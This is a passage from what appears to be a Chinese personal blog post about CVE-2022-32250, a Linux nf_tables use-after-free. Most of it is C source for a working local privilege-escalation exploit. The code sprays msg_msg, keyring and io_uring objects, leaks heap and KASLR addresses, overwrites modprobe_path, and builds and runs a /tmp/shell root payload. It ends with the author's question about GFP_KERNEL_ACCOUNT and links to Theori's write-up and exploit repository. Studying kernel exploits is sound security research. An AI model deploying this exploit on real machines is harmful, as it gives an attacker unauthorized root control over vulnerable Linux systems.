modprobe_addr = base_base + 0x1e8b320;
printf("[+] KASLR base: 0x%llx\n", base_base);
printf("[+] modprobe addr: 0x%llx\n", modprobe_addr);
}
}
return 0;
}

/*
 * Receive `gather_size` messages from a queue and discard their contents.
 *
 * mqdes:       open message queue descriptor.
 * gather_size: number of mq_receive() calls to issue.
 *
 * Returns 0 in all cases; mq_receive() results are deliberately ignored.
 */
int gather_mqueue_nosave(mqd_t mqdes, int gather_size)
{
    char msg[BUFFER];

    printf("[*] gathering mqueue...\n");
    for (int i = 0; i < gather_size; i++)
        (void)mq_receive(mqdes, msg, BUFFER, NULL);

    return 0;
}

/*
 * Send `amount` System V messages of identical content to queue `qid`.
 *
 * size:   total size used to derive the message text length; the text sent
 *         is (size - 0x30) bytes of 0x41.
 * amount: number of msgsnd() calls to issue.
 * qid:    System V message queue identifier.
 *
 * Exits the process with status -1 if `size` is out of range for the local
 * staging buffer or if msgsnd() fails.
 */
void spray_msg_msg(unsigned int size, unsigned int amount, int qid)
{
    char buffer[0x2000];
    msg *spray = (msg *)buffer;
    /* Bytes available for the text once the fields before mtext are taken. */
    const size_t text_cap = sizeof(buffer) - (size_t)((char *)spray->mtext - buffer);
    size_t text_len;

    /*
     * size - 0x30 is unsigned: without this guard a small `size` wraps to a
     * huge length and a large one overruns `buffer`.
     */
    if (size < 0x30 || size - 0x30 > text_cap) {
        fprintf(stderr, "[-] spray_msg_msg: unsupported size 0x%x\n", size);
        exit(-1);
    }
    text_len = size - 0x30;

    printf("[*] try to spray msg_msg\n");
    spray->mtype = 1;

    memset(spray->mtext, 0x41, text_len);

    for (unsigned int i = 0; i < amount; i++) {
        if (i % 0x10 == 0)
            printf("[*] spraying msg_msg: 0x%x\n", i);
        if (msgsnd(qid, spray, text_len, 0) == -1) {
            perror("msgsend failure");
            exit(-1);
        }
    }
}

/*
 * Thin wrapper that issues the io_uring_setup system call directly through
 * syscall().
 *
 * entries: forwarded unchanged as the first syscall argument.
 * p:       forwarded unchanged as the second syscall argument.
 *
 * Returns the syscall() result converted to int.
 */
static inline int io_uring_setup(uint32_t entries, struct io_uring_params *p) {
return syscall(__NR_io_uring_setup, entries, p);
}

/*
 * Thin wrapper that issues the io_uring_register system call directly through
 * syscall().
 *
 * fd, opcode, arg, nr_args: forwarded unchanged, in this order.
 *
 * Returns the syscall() result converted to int.
 */
static inline int io_uring_register(int fd, unsigned int opcode, void *arg, unsigned int nr_args) {
return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}


struct fd_uring *spray_uring(uint32_t spray_size, struct fd_uring *fd_buffer) {

for (uint64_t i = 0; i < spray_size; i++) {

fd_buffer[i].params = malloc(sizeof(struct io_uring_params));
if (!fd_buffer[i].params)
do_error_exit("malloc");
memset(fd_buffer[i].params, 0, sizeof(struct io_uring_params));

fd_buffer[i].fd = io_uring_setup(SPRAY_NB_ENTRIES, fd_buffer[i].params);
if (fd_buffer[i].fd < 0)
do_error_exit("io_uring_create");

}
return fd_buffer;
}

/*
 * Close every descriptor recorded in `fd_buffer`, release each slot's
 * `.params` allocation and finally free the array itself.
 *
 * fd_buffer:   heap-allocated array; ownership passes to this function.
 *              Unused slots must be zero-initialised so that `.params` is
 *              NULL there (free(NULL) is a no-op).
 * buffer_size: number of elements in `fd_buffer`.
 */
void release_uring(struct fd_uring *fd_buffer, uint32_t buffer_size) {
    if (fd_buffer == NULL)
        return;

    for (uint32_t i = 0; i < buffer_size; i++) {
        /* A negative value is never a valid descriptor; skip it. */
        if (fd_buffer[i].fd >= 0)
            close(fd_buffer[i].fd);

        /* The params block was leaked when only the array was freed. */
        free(fd_buffer[i].params);
        fd_buffer[i].params = NULL;
    }
    free(fd_buffer);
}

/*
 * Close the descriptor stored in one slot of `fd_buffer`.
 *
 * fd_buffer:  array of slots.
 * buffer_idx: index of the slot to close; the caller guarantees it is in
 *             range.
 *
 * The slot's `.fd` is set to -1 afterwards. Releasing the same slot again
 * then fails harmlessly with EBADF instead of closing whatever descriptor
 * has reused the old number in the meantime.
 */
void release_partial_uring(struct fd_uring *fd_buffer, uint32_t buffer_idx) {
    close(fd_buffer[buffer_idx].fd);
    fd_buffer[buffer_idx].fd = -1;
}

/*
 * Create the two helper files needed later by calling create_dummy_file()
 * and then create_priv_file(), in that order.
 */
void prepare_root_shell(void) {
create_dummy_file();
create_priv_file();
}

/*
 * Create (or open) the file named by `dummy_file` with mode rwx for user,
 * group and others, and write sizeof(dummy_content) bytes of `dummy_content`
 * into it.
 *
 * Failures of open() or write() are reported through do_error_exit() instead
 * of being silently ignored.
 */
void create_dummy_file(void) {
    int fd = open(dummy_file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);

    if (fd < 0)
        do_error_exit("open");

    if (write(fd, dummy_content, sizeof(dummy_content)) < 0)
        do_error_exit("write");

    close(fd);
}

/*
 * Create (or open) the file named by `priv_file`, write
 * sizeof(priv_context) bytes of `priv_context` into it, then run gcc through
 * system() to build /tmp/shell from /tmp/shell.c.
 *
 * Failures of open() or write() are reported through do_error_exit(); a
 * failing compiler run is reported on stderr but is not fatal.
 */
void create_priv_file(void) {
    int fd = open(priv_file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);

    if (fd < 0)
        do_error_exit("open");

    if (write(fd, priv_context, sizeof(priv_context)) < 0)
        do_error_exit("write");

    close(fd);

    /* system() returns -1 or the command's wait status; 0 means success. */
    if (system("gcc -o /tmp/shell /tmp/shell.c -w") != 0)
        fprintf(stderr, "[-] building /tmp/shell failed\n");
}

/*
 * Read the first 14 bytes of /proc/sys/kernel/modprobe, treat them as a
 * path, create (or open) that path with mode rwx for everyone and write
 * sizeof(new_modprobe_content) bytes of `new_modprobe_content` into it.
 *
 * Every open(), read() and write() failure is reported through
 * do_error_exit().
 */
void write_new_modprobe() {
    int fd, fd_modprobe;
    /* Zero-filled and larger than the 14 bytes read, so always terminated. */
    char modprobe_name[0x10] = {0, };

    fd_modprobe = open("/proc/sys/kernel/modprobe", O_RDONLY);
    if (fd_modprobe < 0)
        do_error_exit("open");

    if (read(fd_modprobe, modprobe_name, 14) < 0)
        do_error_exit("read");
    close(fd_modprobe);

    printf("[*] current modprobe name: %s\n", modprobe_name);
    fd = open(modprobe_name, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
    if (fd < 0)
        do_error_exit("open");

    if (write(fd, new_modprobe_content, sizeof(new_modprobe_content)) < 0)
        do_error_exit("write");

    close(fd);
}

/* Forwards to write_new_modprobe(); performs no other work. */
void setup_modprobe_payload() {
write_new_modprobe();
}

/*
 * Busy-wait until the integer at `sema` reads as zero.
 *
 * sema: flag that is cleared from outside this thread of execution.
 *
 * The flag is read through a volatile-qualified pointer so that every loop
 * iteration performs a real load. With a plain `int *` the compiler may read
 * the value once and turn the loop into an endless spin.
 */
void userland_T(int *sema)
{
    volatile int *flag = sema;

    while (*flag)
        ;
}

/* Set the flag at `sema` to 1. */
void sema_up(int *sema)
{
    sema[0] = 1;
}

/* Clear the flag at `sema` to 0. */
void sema_down(int *sema)
{
    sema[0] = 0;
}

/*
 * Program entry point.
 *
 * Sets up a flag in shared memory, prepares the helper files and forks.
 * The parent waits on the flag and then runs the stage-4 steps; the child
 * runs stages 0-3 in the fixed order below and clears the flag near the end
 * of stage 3.
 *
 * Changes against the original are limited to error handling and unused
 * locals; the sequence of helper calls and their arguments is unchanged.
 */
int main(int argc, char ** argv)
{
    (void)argc;
    (void)argv;

    /* Unbuffered stdio so output from both processes appears immediately. */
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    char mqname[MQUEUE_NUM][NAMELEN] = {"/qname1", "/qname2", "/qname3", "/qname4", "/qname5"};
    mqd_t mqid[MQUEUE_NUM];
    struct mq_attr attr = {
        .mq_flags = 0,
        .mq_maxmsg = 10,
        .mq_msgsize = BUFFER,
        .mq_curmsgs = 0,
    };
    int uaf_id = 0;

    /* MAP_SHARED so that the flag is visible on both sides of fork(). */
    int *sema = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
    if (sema == MAP_FAILED)
        do_error_exit("mmap");

    prepare_root_shell();
    sema_up(sema);

    pid_t child = fork();
    if (child < 0)
        do_error_exit("fork");  /* otherwise the parent branch would spin forever */

    if (child != 0)
    {
        /* Parent: wait until the child clears the flag, then run stage 4. */
        set_cpu_affinity(1, getpid());
        userland_T(sema);
        sleep(1);
        printf("\n\n[------------------------- stage 4: Execute Malicious File -------------------------------]\n");
        setup_modprobe_payload();
        execve("/tmp/dummy", NULL, NULL);
        execve("/tmp/shell", NULL, NULL);
        /* Both execve() calls returned: do not fall into the child's code. */
        do_error_exit("execve");
        return 1;
    }

    unshare_setup(getuid(), getgid());

    set_cpu_affinity(0, 0);

    struct fd_uring *fd_buffer = calloc(SPRAY_SIZE, sizeof(struct fd_uring));
    if (!fd_buffer)
        do_error_exit("calloc");

    /* Only the five queues named in mqname[] are opened. */
    for (int i = 0; i < 5; i++) {
        mqid[i] = mq_open(mqname[i], O_CREAT | O_RDWR, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH, &attr);
        if (mqid[i] == (mqd_t)-1)
            bye("MQUEUE");
    }

    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
    if (nl == NULL)
        do_error_exit("mnl_socket_open");

    printf("\n\n[------------------------- stage 0: Allocate stable table and set ------------------------]\n");
    set_stable_table_and_set(nl, "table1");
    set_stable_table_and_set(nl, "table2");
    set_stable_table_and_set(nl, "table3");
    set_stable_table_and_set(nl, "table4");

    printf("\n\n[------------------------- stage 1: Leak heap address ------------------------------------]\n");
    set_trigger_set_and_overwrite(nl, "table1", "set_trigger0");

    key_serial_t *id_buffer = spray_keyring(0, SPRAY_KEY_SIZE);

    set_trigger_set_and_overwrite(nl, "table1", "set_trigger1");
    if ((uaf_id = get_keyring_leak(id_buffer, SPRAY_KEY_SIZE)) == SPRAY_KEY_SIZE)
        bye("[-] leak failed...");

    printf("\n\n[------------------------- stage 2: Leak KASLR address -----------------------------------]\n");

    spray_uring(SPRAY_SIZE, fd_buffer);

    set_trigger_set_and_overwrite(nl, "table2", "set_trigger2");
    /* NOTE(review): the literal is 36 bytes including its terminator, while
     * spray_mqueue() sends 0x28 bytes per message - confirm this is intended. */
    spray_mqueue(mqid[0], "TESTMSGTESTMSGTESTMSGTESTMSGTESTMSG", 4);

    release_partial_uring(fd_buffer, SPRAY_SIZE-1);
    /* NOTE(review): with i starting at 3 the condition i > 113 is false on
     * entry, so this loop body never runs. Kept as in the original. */
    for (int i = 3; i > 113; i++)
        release_partial_uring(fd_buffer, SPRAY_SIZE-i);
    release_partial_uring(fd_buffer, SPRAY_SIZE-2);
    set_trigger_set_and_overwrite(nl, "table2", "set_trigger3");
    key_serial_t *id_buffer3 = spray_keyring_list_del_purpose(SPRAY_KEY_SIZE*2, heap_base, heap_base, 0x28);// keyring <-> msg_msg overlap
    (void)id_buffer3;   /* result is not used afterwards */
    gather_mqueue(mqid[0], 1);

    sleep(1);
    printf("\n\n[------------------------- stage 3: Overwrite modprobe_path ------------------------------]\n");

    set_trigger_set_and_overwrite(nl, "table3", "set_trigger4");
    spray_mqueue(mqid[1], "TESTMSGTESTMSGTESTMSGTESTMSGTESTMSG", 4);
    set_trigger_set_and_overwrite(nl, "table3", "set_trigger5");
    id_buffer = spray_keyring_list_del_purpose(1, modprobe_addr-0x8+0x1, (heap_base&0xffffffff00000000)+0x2f706d74, 0x10);
    /* Clear the shared flag: the parent leaves userland_T() and continues. */
    sema_down(sema);
    gather_mqueue_nosave(mqid[1], 1);

    sleep(1);
    for (int i = SPRAY_SIZE/2+12; i < SPRAY_SIZE; i++)
        release_partial_uring(fd_buffer, i);

    /* The child never returns from main; it spins here indefinitely. */
    while(1);
}

这里同样用到了 io_uring。不过我注意到它分配内存时使用的标志其实是 GFP_KERNEL_ACCOUNT,不明白为什么在这里仍然可以用它来占位(有种自相矛盾的感觉)。


参考链接:

https://blog.theori.io/linux-kernel-exploit-cve-2022-32250-with-mqueue-a8468f32aab5

https://github.com/theori-io/CVE-2022-32250-exploit

 评论
评论插件加载失败
正在加载评论插件
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 335.6k 访客数 访问量